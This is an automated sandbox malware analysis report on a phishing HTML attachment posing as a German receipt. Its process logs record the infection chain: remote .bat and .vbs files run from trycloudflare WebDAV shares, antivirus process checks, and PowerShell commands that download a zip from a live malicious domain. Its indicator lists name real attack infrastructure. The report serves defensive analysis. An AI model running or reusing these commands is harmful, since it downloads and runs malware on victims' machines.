      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1647
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8221
      Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 951
      Source: C:\Windows\System32\svchost.exe TID: 6264Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5080Thread sleep count: 1647 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5080Thread sleep count: 8221 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6964Thread sleep time: -7378697629483816s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3856Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3856Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c \\cultural-theorem-enclosed-meaningful.trycloudflare.com@SSL\DavWWWRoot\onzau.bat
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\BNAGMGSPLO.pdf"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "AvastUI.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "avgui.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://cjmsc4dfl1ed7eb485ad6ahelix-pflanzen.de:2610/WRBETIS.zip' -OutFile 'C:\Users\user\Downloads\downloadpack.zip' } catch { exit 1 }"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "try { [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; invoke-webrequest -uri 'http://cjmsc4dfl1ed7eb485ad6ahelix-pflanzen.de:2610/wrbetis.zip' -outfile 'c:\users\user\downloads\downloadpack.zip' } catch { exit 1 }"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "try { [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; invoke-webrequest -uri 'http://cjmsc4dfl1ed7eb485ad6ahelix-pflanzen.de:2610/wrbetis.zip' -outfile 'c:\users\user\downloads\downloadpack.zip' } catch { exit 1 }"
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Stealing of Sensitive Information

      barindex
      Opens network shares
      Source: C:\Windows\System32\wscript.exeFile opened: \\ira-documents-fix-survivor.trycloudflare.com@SSL\DavWWWRoot\porderx.vbs
      Source: C:\Windows\System32\wscript.exeFile opened: \\ira-documents-fix-survivor.trycloudflare.com@SSL\DavWWWRoot\porderx.vbs
      Source: C:\Windows\System32\wscript.exeFile opened: \\ira-documents-fix-survivor.trycloudflare.com@SSL\DavWWWRoot\
      Source: C:\Windows\System32\cmd.exeFile opened: \\cultural-theorem-enclosed-meaningful.trycloudflare.com@SSL\DavWWWRoot\onzau.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\cultural-theorem-enclosed-meaningful.trycloudflare.com@SSL\DavWWWRoot\
      Source: C:\Windows\System32\cmd.exeFile opened: \\cultural-theorem-enclosed-meaningful.trycloudflare.com@SSL\DavWWWRoot\onzau.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\cultural-theorem-enclosed-meaningful.trycloudflare.com@SSL\DavWWWRoot\onzau.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\cultural-theorem-enclosed-meaningful.trycloudflare.com@SSL\DavWWWRoot\onzau.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\cultural-theorem-enclosed-meaningful.trycloudflare.com@SSL\DavWWWRoot\onzau.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\cultural-theorem-enclosed-meaningful.trycloudflare.com@SSL\DavWWWRoot\onzau.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\cultural-theorem-enclosed-meaningful.trycloudflare.com@SSL\DavWWWRoot\onzau.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\cultural-theorem-enclosed-meaningful.trycloudflare.com@SSL\DavWWWRoot\onzau.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\cultural-theorem-enclosed-meaningful.trycloudflare.com@SSL\DavWWWRoot\onzau.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\cultural-theorem-enclosed-meaningful.trycloudflare.com@SSL\DavWWWRoot\onzau.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\cultural-theorem-enclosed-meaningful.trycloudflare.com@SSL\DavWWWRoot\onzau.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\cultural-theorem-enclosed-meaningful.trycloudflare.com@SSL\DavWWWRoot\onzau.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\cultural-theorem-enclosed-meaningful.trycloudflare.com@SSL\DavWWWRoot\onzau.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\cultural-theorem-enclosed-meaningful.trycloudflare.com@SSL\DavWWWRoot\onzau.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\cultural-theorem-enclosed-meaningful.trycloudflare.com@SSL\DavWWWRoot\onzau.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\cultural-theorem-enclosed-meaningful.trycloudflare.com@SSL\DavWWWRoot\onzau.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\cultural-theorem-enclosed-meaningful.trycloudflare.com@SSL\DavWWWRoot\onzau.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\cultural-theorem-enclosed-meaningful.trycloudflare.com@SSL\DavWWWRoot\onzau.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\cultural-theorem-enclosed-meaningful.trycloudflare.com@SSL\DavWWWRoot\onzau.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\cultural-theorem-enclosed-meaningful.trycloudflare.com@SSL\DavWWWRoot\onzau.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\cultural-theorem-enclosed-meaningful.trycloudflare.com@SSL\DavWWWRoot\onzau.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\cultural-theorem-enclosed-meaningful.trycloudflare.com@SSL\DavWWWRoot\onzau.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\cultural-theorem-enclosed-meaningful.trycloudflare.com@SSL\DavWWWRoot\onzau.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\cultural-theorem-enclosed-meaningful.trycloudflare.com@SSL\DavWWWRoot\

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information112
      Scripting      		Valid Accounts1
      Windows Management Instrumentation      		112
      Scripting      		11
      Process Injection      		11
      Masquerading      		OS Credential Dumping1
      Network Share Discovery      		Remote ServicesData from Local System2
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Command and Scripting Interpreter      		1
      Registry Run Keys / Startup Folder      		1
      Registry Run Keys / Startup Folder      		31
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Security Software Discovery      		Remote Desktop ProtocolData from Removable Media11
      Non-Standard Port      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      Exploitation for Client Execution      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		11
      Process Injection      		Security Account Manager2
      Process Discovery      		SMB/Windows Admin SharesData from Network Shared Drive3
      Ingress Tool Transfer      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal Accounts2
      PowerShell      		Login Hook1
      Extra Window Memory Injection      		1
      DLL Side-Loading      		NTDS31
      Virtualization/Sandbox Evasion      		Distributed Component Object ModelInput Capture3
      Non-Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Extra Window Memory Injection      		LSA Secrets1
      Application Window Discovery      		SSHKeylogging4
      Application Layer Protocol      		Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
      File and Directory Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync23
      System Information Discovery      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Belegdetails Nr378-938-027181-PDF.html11%ReversingLabsDocument-HTML.Exploit.Generic

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      file:///C:/Users/user/Desktop/Belegdetails%20Nr378-938-027181-PDF.html0%Avira URL Cloudsafe
      http://cjmsc4dfl1ed7eb485ad6ahelix-pflanzen.de:2610/WRBETIS.zip0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      bg.microsoft.map.fastly.net
      		199.232.210.172
      		truefalse
        		high
        cjmsc4dfl1ed7eb485ad6ahelix-pflanzen.de
        		83.136.209.53
        		truetrue
          		unknown
          winaero.com
          		68.183.112.81
          		truefalse
            		high
            www.google.com
            		172.217.171.228
            		truefalse
              		high
              msc4dfl1ed7eb485ad6ahelixpflanzen.de
              		83.136.208.180
              		truetrue
                		unknown
                x1.i.lencr.org
                		unknown
                		unknownfalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://cjmsc4dfl1ed7eb485ad6ahelix-pflanzen.de:2610/WRBETIS.ziptrue
                  • Avira URL Cloud: safe
                  		unknown
                  file:///C:/Users/user/Desktop/Belegdetails%20Nr378-938-027181-PDF.htmltrue
                  • Avira URL Cloud: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  23.203.161.57
                  		unknownUnited States
                  		16625AKAMAI-ASUSfalse
                  1.1.1.1
                  		unknownAustralia
                  		13335CLOUDFLARENETUSfalse
                  68.183.112.81
                  		winaero.comUnited States
                  		14061DIGITALOCEAN-ASNUSfalse
                  172.217.17.46
                  		unknownUnited States
                  		15169GOOGLEUSfalse
                  172.217.17.35
                  		unknownUnited States
                  		15169GOOGLEUSfalse
                  83.136.208.180
                  		msc4dfl1ed7eb485ad6ahelixpflanzen.deFrance
                  		31591EDATIS-ASFRtrue
                  2.16.229.162
                  		unknownEuropean Union
                  		20940AKAMAI-ASN1EUfalse
                  92.122.144.171
                  		unknownEuropean Union
                  		16625AKAMAI-ASUSfalse
                  216.58.208.227
                  		unknownUnited States
                  		15169GOOGLEUSfalse
                  50.16.47.176
                  		unknownUnited States
                  		14618AMAZON-AESUSfalse
                  64.233.165.84
                  		unknownUnited States
                  		15169GOOGLEUSfalse
                  239.255.255.250
                  		unknownReserved
                  		unknownunknownfalse
                  142.251.37.238
                  		unknownUnited States
                  		15169GOOGLEUSfalse
                  83.136.209.53
                  		cjmsc4dfl1ed7eb485ad6ahelix-pflanzen.deFrance
                  		31591EDATIS-ASFRtrue
                  172.217.171.228
                  		www.google.comUnited States
                  		15169GOOGLEUSfalse
                  199.232.210.172
                  		bg.microsoft.map.fastly.netUnited States
                  		54113FASTLYUSfalse
                  23.195.92.153
                  		unknownUnited States
                  		16625AKAMAI-ASUSfalse
                  172.64.41.3
                  		unknownUnited States
                  		13335CLOUDFLARENETUSfalse

                  Private

                  IP
                  192.168.2.17
                  127.0.0.1

                  General Information

                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1567616
                  Start date and time:2024-12-03 16:38:55 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:41
                  Number of new started drivers analysed:1
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • EGA enabled
                  Analysis Mode:stream
                  Analysis stop reason:Timeout
                  Sample name:Belegdetails Nr378-938-027181-PDF.html
                  Detection:MAL
                  Classification:mal84.phis.troj.spyw.expl.evad.winHTML@53/26@9/153
                  Cookbook Comments:
                  • Found application associated with file extension: .html

                  Warnings

                  • Exclude process from analysis (whitelisted): dllhost.exe
                  • Excluded IPs from analysis (whitelisted): 216.58.208.227, 172.217.17.46, 64.233.165.84, 34.104.35.123, 192.229.221.95
                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, ocsp.digicert.com, accounts.google.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: Belegdetails Nr378-938-027181-PDF.html

                  Created / dropped Files

                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\1b82c587-7405-4fc8-a5d1-3d7c45639ed4.tmp

                  Download File
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  File Type:JSON data
                  Category:modified
                  Size (bytes):384
